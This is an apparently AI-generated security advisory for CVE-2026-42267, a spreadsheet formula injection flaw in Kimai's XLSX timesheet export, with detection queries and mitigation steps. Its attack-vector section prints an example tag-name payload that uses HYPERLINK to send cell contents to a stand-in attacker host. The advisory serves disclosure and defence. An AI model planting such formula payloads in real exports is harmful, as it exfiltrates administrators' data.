CVE-2026-42267 Overview
CVE-2026-42267 is a formula injection vulnerability in Kimai, an open-source time tracking application. The flaw affects versions 2.27.0 through versions prior to 2.54.0. Any authenticated user with ROLE_USER can create a tag whose name begins with = via POST /api/tags, then attach it to a timesheet. When an administrator exports timesheets to XLSX, the malicious tag name is written as a spreadsheet formula and executed when the file opens in Excel. The issue is classified under [CWE-1236] Improper Neutralization of Formula Elements in a CSV File.
Critical Impact
A low-privileged Kimai user can inject spreadsheet formulas that execute in an administrator's Excel session during XLSX export, enabling data exfiltration or client-side code execution paths.
Affected Products
- Kimai versions 2.27.0 through 2.53.x
- Kimai self-hosted deployments exposing the /api/tags endpoint
- Any Kimai instance whose administrators export timesheets to XLSX
Discovery Timeline
- 2026-05-08 - CVE-2026-42267 published to NVD
- 2026-05-13 - Last updated in NVD database
- Kimai version 2.54.0 released with the fix
Technical Details for CVE-2026-42267
Vulnerability Analysis
The vulnerability resides in the XLSX export pipeline for timesheets. When an administrator triggers an export, Kimai's ArrayFormatter.formatValue() joins all tag names assigned to a timesheet using PHP's implode() and returns the concatenated string without sanitization. The downstream OpenSpout library inspects each cell value during XLSX serialization. Strings beginning with = are promoted to a FormulaCell and written into the workbook XML as <f>...</f> elements. Excel evaluates these formula nodes when the file opens, treating attacker-controlled tag data as executable spreadsheet logic.
Formula injection in spreadsheet exports extends beyond benign arithmetic. Adversaries can craft payloads that invoke HYPERLINK, DDE, WEBSERVICE, or external command primitives depending on the victim's Excel version and macro settings. Exfiltration of cell contents to attacker-controlled hosts is achievable without macros.
Root Cause
Kimai trusts user-supplied tag names as plain text throughout its data model. The export code path does not neutralize leading =, +, -, @, or tab characters before passing values to OpenSpout. Because OpenSpout interprets the leading = as a directive to create a formula cell, the tag name becomes an active formula in the exported workbook.
Attack Vector
An authenticated user with the default ROLE_USER permission issues an authenticated POST /api/tags request with a payload such as {"name":"=HYPERLINK(\"https://attacker.example/?d=\"&A1,\"click\")"}. The user then assigns the tag to one of their own timesheet entries. The next time an administrator exports timesheets to XLSX and opens the file, Excel evaluates the formula in the administrator's session context. Exploitation requires user interaction from the victim administrator who opens the exported file. See the GitHub Security Advisory GHSA-3xc2-h5r3-wv3r for additional technical detail.
Detection Methods for CVE-2026-42267
Indicators of Compromise
- Tag records in the Kimai database whose name column begins with =, +, -, @, or a tab character.
- POST /api/tags requests in web server logs containing JSON bodies with formula-prefixed name values.
- Exported XLSX files containing <f> elements within xl/worksheets/sheet*.xml that reference functions such as HYPERLINK, WEBSERVICE, IMPORTDATA, or DDE.
Detection Strategies
- Query the kimai2_tags table for name LIKE '=%' OR name LIKE '+%' OR name LIKE '-%' OR name LIKE '@%' to surface injected tags.
- Inspect API access logs for POST /api/tags calls originating from non-administrative accounts that include formula characters in the request body.
- Unzip recent XLSX exports and grep sheet XML for <f> formula nodes that originated from tag columns.
Monitoring Recommendations
- Alert on the creation of any tag whose name starts with a spreadsheet formula trigger character.
- Monitor administrator workstations for Excel processes spawning network connections or child processes shortly after opening Kimai exports.
- Track Kimai application version across hosts and flag any instance running 2.27.0 through 2.53.x.
How to Mitigate CVE-2026-42267
Immediate Actions Required
- Upgrade Kimai to version 2.54.0 or later on every deployment.
- Audit the kimai2_tags table for existing tags whose names begin with formula trigger characters and remove or rename them.
- Re-issue any XLSX timesheet exports generated since 2.27.0 was deployed, as previously distributed files may contain live formulas.
Patch Information
The maintainers fixed the issue in Kimai 2.54.0. The release notes and patched code are available at the Kimai 2.54.0 GitHub Release. The vendor advisory is published as GHSA-3xc2-h5r3-wv3r.
Workarounds
- Restrict tag creation to trusted administrative roles until the upgrade is complete by tightening API permissions on /api/tags.
- Instruct administrators to open exported XLSX files in Protected View and to decline any prompts to enable formulas, external content, or DDE.
- Post-process exports through a script that prefixes cells starting with =, +, -, @, or tab with a single quote to neutralize formula evaluation.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
